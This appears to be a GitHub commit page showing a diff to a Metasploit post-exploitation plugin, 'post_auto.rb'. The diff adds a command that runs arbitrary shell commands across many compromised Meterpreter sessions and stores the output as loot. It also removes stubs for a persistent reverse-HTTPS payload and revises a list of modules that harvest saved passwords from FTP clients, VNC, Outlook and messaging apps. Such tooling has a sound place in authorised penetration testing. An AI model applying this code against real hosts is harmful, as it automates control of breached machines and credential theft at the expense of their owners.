Browse files

updated with new command

  • Loading branch information...
1 parent 1233f4f commit 8be3edb038d146590623f881e632c49c178f8c12 @darkoperator committed Sep 29, 2011
Showing with 65 additions and 78 deletions.
  1. +65 −78 post_auto.rb
View
143 post_auto.rb
@@ -19,8 +19,6 @@
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-# NOTE: Change later name of module and break commands by type.
module Msf
class Plugin::Postauto < Msf::Plugin
class PostautoCommandDispatcher
@@ -36,81 +34,73 @@ def commands
'multi_post_rc' => "Run resource file with post modules and options against specified sessions.",
'multi_meter_cmd' => "Run a Meterpreter Console Command against specified sessions.",
'multi_meter_cmd_rc' => "Run resource file with Meterpreter Console Commands against specified sessions.",
+ "multi_cmd" => "Run shell command against several sessions",
"sys_creds" => "Run system password collection modules against specified sessions.",
- "app_creds" => "Run application password collection modules against specified sessions.",
- #"import_medusa" => "Import output file generated by Medussa Bruteforce tool.",
- #"persist_mem" => "Add Meterpreter Reverse HTTPS memory persistan payload to specified sessions.",
- #"persist_file" => "Add Meterpreter Reverse HTTPS boot persistant payload to specified sessions."
+ "app_creds" => "Run application password collection modules against specified sessions."
}
end
-
- def cmd_persist_mem(*args)
+ # Multi shell command
+ def cmd_multi_cmd(*args)
+ # Define options
opts = Rex::Parser::Arguments.new(
- "-s" => [ true, "Sessions to run modules against. Example <all> or <1,2,3,4>"],
- "-l" => [ true, "Comma separated list of IP's to receive connection."],
- "-p" => [ true, "Port for reverse connection. Default 8443."],
- "-hd" => [ false, "Start handler for connection."],
+ "-s" => [ true, "Comma separated list of essions to run modules against."],
+ "-c" => [ true, "Shell command to run."],
+ "-p" => [ true, "Platform to run the command against. If none given it will run against all."],
"-h" => [ false, "Command Help"]
)
- meter_payload = "windows/meterpreter/reverse_https"
- rport = 8443
- start_handler = false
- ip_list = nil
- sessions = nil
- end
-
- # browser_creds Command
- # Note need to finish
- #-------------------------------------------------------------------------------------------
- def cmd_import_medusa(*args)
- opts = Rex::Parser::Arguments.new(
- "-f" => [ true, "Medusa output file to import."],
- "-h" => [ false, "Command Help"]
- )
- out_file = nil
- entries = ""
+ # set variables for options
+ sessions = []
+ command = ""
+ plat = ""
+ # Parse options
opts.parse(args) do |opt, idx, val|
case opt
- when "-f"
- out_file = val
- if not ::File.exists?(script)
- print_error "Resource File does not exists!"
- return
- else
- ::File.open(out_file, "r").each_line do |line|
- # Empty line
- next if line.strip.length < 1
- # Comment
- next if line[0,1] == "#"
- entries << line.chomp
+ when "-s"
+ if val =~ /all/i
+ sessions = framework.sessions.keys
+ else
+ sessions = val.split(",")
end
- end
- when "-h"
- print_line opts.usage
- return
+
+ when "-c"
+ command = val
+ when "-p"
+ plat = val
+ when "-h"
+ print_line(opts.usage)
+ return
end
end
- entries.each_line do |l|
- if l =~ /SUCCESS/
- service,host,user,pass = l.scan(/\[(\w*)\]\sHost\:\s(\S*)\sUser\:\s(\S*)\sPassword\:\s(\S*)\s\[SUCCESS\]/)[0]
- case service
- when /ssh/
- port = 22
- srv = service
- when /smbnt/
- port = 445
- srv = 'smb'
+
+ # Make sure that proper values where provided
+ if not sessions.empty? and not command.empty?
+ # Iterate thru the session IDs
+ sessions.each do |s|
+ # Set the session object
+ session = framework.sessions[s.to_i]
+ if session.platform =~ /#{plat}/i || plat.empty?
+ host = session.tunnel_peer.split(":")[0]
+ print_status("Running #{command} against session #{s}")
+ # Run the command
+ cmd_out = session.shell_command_token(command)
+ # Print good each line of the command output
+ cmd_out.each_line do |l|
+ print_good(l.chomp)
+ end
+ file_name = "#{File.join(Msf::Config.loot_directory,"#{Time.now.strftime("%Y%m%d%H%M%S")}_command.txt")}"
+ framework.db.report_loot({ :host=> host,
+ :path=> file_name,
+ :ctype=> "text/plain",
+ :ltype=> "host.command.shell",
+ :data=> cmd_out,
+ :name=>"#{host}.txt",
+ :info=> "Output of command #{command}" })
end
- auth =
- {
- :host => host, :port => port, :sname => srv,
- :user => user, :pass => pass,
- :type => 'password', :active => true
- }
- framework.db.report_auth_info(auth)
end
+ else
+ print_error("You must specify both a session and a command!")
end
end
@@ -124,21 +114,18 @@ def cmd_app_creds(*args)
)
cred_mods = [
- {"mod" => "windows/gather/credentials/nimbuzz", "opt" => nil},
- {"mod" => "windows/gather/credentials/trillian", "opt" => nil},
- {"mod" => "windows/gather/credentials/smartftp", "opt" => nil},
- {"mod" => "windows/gather/credentials/filezilla_server", "opt" => nil},
- {"mod" => "windows/gather/credentials/wsftp_client", "opt" => nil},
- {"mod" => "windows/gather/credentials/coreftp", "opt" => nil},
- {"mod" => "windows/gather/credentials/winscp", "opt" => nil},
- {"mod" => "windows/gather/credentials/vnc", "opt" => nil},
- {"mod" => "windows/gather/credentials/mremote", "opt" => nil},
- {"mod" => "windows/gather/credentials/total_commander", "opt" => nil},
- {"mod" => "windows/gather/credentials/idm", "opt" => nil},
- {"mod" => "windows/gather/credentials/flashfxp", "opt" => nil},
- {"mod" => "windows/gather/credentials/imail", "opt" => nil},
- {"mod" => "windows/gather/credentials/outlook", "opt" => nil},
- {"mod" => "windows/gather/credentials/enum_meebo_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_coreftp_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_flashfxp_pwd", "opt" => nil},
+ {"mod" => "windows/gather/enum_idm_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_imail_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_mremote_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_nimbuzz_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_outlook_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_smartftp_pwd", "opt" => nil},
+ {"mod" => "windows/gather/enum_trillian_pwds", "opt" => nil},
+ {"mod" => "windows/gather/enum_vnc_pw", "opt" => nil},
+ {"mod" => "windows/gather/enum_winscp_pwds", "opt" => nil},
+ {"mod" => "windows/gather/wsftp_client_creds", "opt" => nil},
{"mod" => "multi/gather/pidgin_cred", "opt" => nil},
{"mod" => "multi/gather/filezilla_client_cred", "opt" => nil},
{"mod" => "multi/gather/ssh_creds", "opt" => nil},
@@ -512,4 +499,4 @@ def desc
"Plugin for Post-Exploitation automation."
end
end
-end
+end

0 comments on commit 8be3edb

Please sign in to comment.